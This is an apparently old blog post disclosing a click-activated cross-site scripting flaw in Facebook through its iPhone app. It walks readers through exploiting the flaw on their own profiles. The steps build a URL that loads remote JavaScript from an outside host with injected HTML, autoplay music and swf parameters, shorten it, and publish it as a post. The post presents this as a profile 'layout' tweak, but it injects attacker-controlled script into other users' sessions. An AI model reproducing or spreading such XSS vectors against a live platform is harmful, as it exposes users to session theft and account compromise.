Facebook XSS again. This time is activated onClick via Facebook iPhone application. I decided to reveal this to public, as one of our friends has found this accidentally and many have also posted it publicly on their wall. sooner or later they will find out then patch this vulnerability again anyway. This XSS vulnerability was actually found back on the year 2009. I used this before using the old “profile box” to load XSS on my profile. I didnt use this at that time as it’s actually activated onClick, meaning that the script will load on users click, not autorun.
This time we will post the XSS vector via iPhone apps. OK, if you want to see real facebook layout on your own profile, without any addon, please follow these steps carefully :
- Customize this URL to your own need :http://static.int.crazydavinci.net/facebook/fb_layout.js?text=Welcome to my profile&mp3=http://crazydavinci.info/music/TrailofTears-SignofTheSameless.mp3&profpic=<img width=200 src=http://static.int.crazydavinci.net/images/facebook-logo.png />important : for profpic parameter, If your HTML code has “&” char, you must change every “&” character with %26 or the code wont work
- change the red part with your own value :text = running text on your profile name
mp3 = autoplay mp3 as a background music
profpic = innerHTML code for your profile picture (you can also use swf embed) - Shorten the long URL above using any url shortener, like tinyurl.com, is.gd, tiny.cc, goo.gl, etc
- CLICK HERE to generate the XSS vector
- Press Publish Button
- Enjoy your layout
Happy tweaking